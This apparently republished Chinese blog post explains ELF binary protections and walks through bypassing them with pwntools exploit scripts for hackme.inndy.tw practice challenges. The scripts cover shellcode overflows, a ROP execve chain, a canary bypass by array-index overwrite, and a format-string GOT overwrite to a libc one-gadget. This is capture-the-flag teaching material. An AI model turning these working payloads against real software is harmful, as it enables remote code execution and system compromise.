前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >ELF文件保护机制解读及绕过

ELF文件保护机制解读及绕过

作者头像
tinyfisher
发布2019-11-20 18:46:58
1.3K0
发布2019-11-20 18:46:58
举报
文章被收录于专栏:湛卢工作室

ELF文件保护机制解读及绕过

查看ELF文件保护机制,通过工具checksec(https://github.com/slimm609/checksec.sh)

代码语言:javascript
复制
1root@ubuntu:~checksec echo2 
2[*] '/root/echo2'
3    Arch:     amd64-64-little
4    RELRO:    Partial RELRO
5    Stack:    No canary found
6    NX:       NX enabled
7    PIE:      PIE enabled

函数调用惯例示意图:

代码语言:javascript
复制
1esp -> |deadbeef|
2       |........|      <- 可控
3ebp -> |deadffff|
4ret -> |&main237|
5p3  -> |00000001|
6p2  -> |00000001|
7p1  -> |bffff608|
8p0  -> |00000002|

无防护攻击

通过输入超长内容,找出buff长度,通过溢出覆盖ret内容到现在的esp地址,构造payload:

代码语言:javascript
复制
1payload1 = shellcode + (len_buf-len(shellcode)) * "A" + p32(ret_address)
2payload2 = len_buf * "A" + p32(jump_esp) + shellcode

比如scoreboard上的toooomuch:

代码语言:javascript
复制
 1#!/usr/bin/python env
 2
 3from pwn import * 
 4
 5pro_process = remote('hackme.inndy.tw',7702)
 6
 7shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
 8shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
 9shellcode += "\x0b\xcd\x80"
10
11integrate_shellcode = 'A' * 28 + p32(0xb7e1caa9) + shellcode
12
13pro_process.sendafter('Give me your passcode: ',integrate_shellcode)
14pro_process.interactive()

调用可以写入的函数,写入/bin/sh到.bss,通过ROPgadget(https://github.com/JonathanSalwan/ROPgadget)查找pop ret,构造payload,toooomuch的另一种解法:

代码语言:javascript
复制
 1#!/usr/bin/python env
 2from pwn import *
 3
 4elf_file = ELF('./toooomuch')
 5bin_sh_code = '/bin/sh\0'
 6
 7exec_system = elf_file.plt['system']
 8print "function system plt address is: %x" % exec_system 
 9gets_addr = elf_file.symbols['gets']
10print "funcion gets symbols address is %x:" % gets_addr 
11bss_addr = elf_file.bss()
12print "bss segement address is %x:" % bss_addr
13
14length_pattern = 28
15pro_process = remote('hackme.inndy.tw', 7702)
16
17popret_addr = 0x8048455
18integrate_shellcode = 'K' * length_pattern + p32(gets_addr) + p32(popret_addr) + p32(bss_addr) + p32(exec_system) + p32(bss_addr) + p32(bss_addr) 
19pro_process.sendafter('Give me your passcode: ',integrate_shellcode)
20pro_process.sendline(bin_sh_code)
21pro_process.interactive()

栈不可执行

NX: NX enabled 栈不可执行时,则不可直接将shellcode写入栈 可通过上述的toooomuch例子,将/bin/sh写入.bss,然后调用system函数

首先,file命令查看文件属性:

代码语言:javascript
复制
1rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e9ed96cd1a8ea3af86b7b73048c909236d570d9e, not stripped

非动态链接程序文件可直接通过ROPgadget生成ropchain,并溢出到栈上,比如scoreboard上面的rop题

代码语言:javascript
复制
 1#!/usr/bin/env python2
 2# execve generated by ROPgadget
 3from pwn import *
 4from struct import pack
 5# Padding goes here
 6
 7p = 'A' * 16
 8p += pack('<I', 0x0806ecda) # pop edx ; ret
 9p += pack('<I', 0x080ea060) # @ .data
10p += pack('<I', 0x080b8016) # pop eax ; ret
11p += '/bin'
12p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
13p += pack('<I', 0x0806ecda) # pop edx ; ret
14p += pack('<I', 0x080ea064) # @ .data + 4
15p += pack('<I', 0x080b8016) # pop eax ; ret
16p += '//sh'
17p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
18p += pack('<I', 0x0806ecda) # pop edx ; ret
19p += pack('<I', 0x080ea068) # @ .data + 8
20p += pack('<I', 0x080492d3) # xor eax, eax ; ret
21p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
22p += pack('<I', 0x080481c9) # pop ebx ; ret
23p += pack('<I', 0x080ea060) # @ .data
24p += pack('<I', 0x080de769) # pop ecx ; ret
25p += pack('<I', 0x080ea068) # @ .data + 8
26p += pack('<I', 0x0806ecda) # pop edx ; ret
27p += pack('<I', 0x080ea068) # @ .data + 8
28p += pack('<I', 0x080492d3) # xor eax, eax ; ret
29p += pack('<I', 0x0807a66f) # inc eax ; ret
30p += pack('<I', 0x0807a66f) # inc eax ; ret
31p += pack('<I', 0x0807a66f) # inc eax ; ret
32p += pack('<I', 0x0807a66f) # inc eax ; ret
33p += pack('<I', 0x0807a66f) # inc eax ; ret
34p += pack('<I', 0x0807a66f) # inc eax ; ret
35p += pack('<I', 0x0807a66f) # inc eax ; ret
36p += pack('<I', 0x0807a66f) # inc eax ; ret
37p += pack('<I', 0x0807a66f) # inc eax ; ret
38p += pack('<I', 0x0807a66f) # inc eax ; ret
39p += pack('<I', 0x0807a66f) # inc eax ; ret
40p += pack('<I', 0x0806c943) # int 0x80
41
42pro_process = remote('hackme.inndy.tw',7704)
43pro_process.send(p)
44pro_process.interactive()

金丝雀

金丝雀是指,在函数返回之前,会检查栈上特定位置的内容,如果和放入时的不同,则说明栈的数据被异常修改,在有金丝雀的情况下,不可直接溢出,需要通过数组或格式化字符串等指定位置修改,通过修改返回地址、GOT表等内容达到溢出

通过数组溢出,修改指定位置,如scoreboard中的homework:

代码语言:javascript
复制
 1#!/usr/bin/python env
 2
 3from pwn import *
 4import time
 5
 6pro_process = process('./homework')
 7print pro_process.recvline(keepends=True)
 8pro_process.sendafter('What\'s your name? ', '1')
 9#print 'Input name success'
10print pro_process.recvline(4)
11pro_process.send('1')
12print 'Choose edit success'
13time.sleep(5)
14pro_process.send('14')
15print 'Choose edit number success'
16time.sleep(5)
17pro_process.send('134514171')
18print 'Rewrite return address success'
19pro_process.readline()
20pro_process.send('0')
21print 'exit success\\n waiting for interactive...'
22pro_process.interactive()

但是金丝雀防护的开销较大,每个函数都要增加五条汇编指令

地址随机化

可通过格式化字符串漏洞,泄漏栈上的内容,如__libc_start_main_ret地址,通过libc-database确定libc版本,查找libc中的Magic地址,修改某个后续会调用的函数的GOT表,getshell

比如scoreboard中的echo2

代码语言:javascript
复制
 1#!/usr/bin/python env
 2from pwn import *
 3from libnum import *
 4from sys import *
 5elf_file = ELF('./echo2')
 6pro_process = process('./echo2') if argv[1]=="1" else remote('hackme.inndy.tw', 7712)
 7static_exit_got = elf_file.got['exit']
 8static_system_got = elf_file.got['system']
 9# Leak  
10def standLeak():
11    payload = "%47$p\n"
12    pro_process.send(payload)
13    main_start = pro_process.recvline()
14    base_oppo = eval(main_start) & 0xfffffffff000
15    print "base_oppo => " + hex(base_oppo)
16    return base_oppo
17
18# choose: 0 => local,libc2.7    1 => remote libc2.3
19def libcLeak(choose):
20    oppo_addr = 0x21b97 if choose=="1" else 0x20830 
21    payload = "%43$p\n"
22    pro_process.send(payload)
23    start_ret = pro_process.recvline()
24    libc_oppo = eval(start_ret) - oppo_addr
25    print "libc_oppo => " + hex(libc_oppo)
26    return libc_oppo
27
28#write content
29def writeAddr(content,addr):
30    if content:
31        temp_content = content & 0xffff
32        payload = "%" + str(temp_content).zfill(5) + "x%8$hnAAAA" + p64(addr) + "\n"
33        print "Write paylaod is: " + payload[1:-1]
34        wating = raw_input("wait to continue...")
35        pro_process.send(payload)
36        pro_process.recv()
37        #pro_process.send('\n')
38        #pro_process.recv()
39        #wating = raw_input("wait to continue...")
40        print "Write " + hex(temp_content) + " => " + hex(addr)
41        content = content >> 16
42        addr = addr + 2
43        writeAddr(content, addr)
44    else:
45        print "Nothing to write anymore."
46
47
48
49libc23_magic = 0xf0897
50libc27_magic = 0x4f322
51libc_magic = libc27_magic if argv[1]=="1" else libc23_magic
52print "libc_magic => " + hex(libc_magic)
53Base_oppo = standLeak()
54Libc_oppo = libcLeak(argv[1])
55Real_magic = Libc_oppo + libc_magic 
56Writeaddr = Base_oppo + static_system_got 
57print "Real_magic => " + hex(Real_magic)
58print "Writeaddr => " + hex(Writeaddr)
59writeAddr(Real_magic, Writeaddr)
60Wating = raw_input("Wait to check...")
61pro_process.send('exit\n')
62#pro_process.recv()
63pro_process.interactive()

Tips

格式化字符串漏洞,是由于printf函数的参数数目并不固定,在直接使用printf(input)时,如果input为%x,则会按照函数的调用惯例获取参数;通过%s参数,结合栈上其他可控的位置,可对任意位置内容进行读取;通过%n,将前面输出内容的长度写入对应地址,可对任意地址内容进行改写。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2018-11-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 湛卢工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 无防护攻击
  • 栈不可执行
  • 金丝雀
  • 地址随机化
  • Tips
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档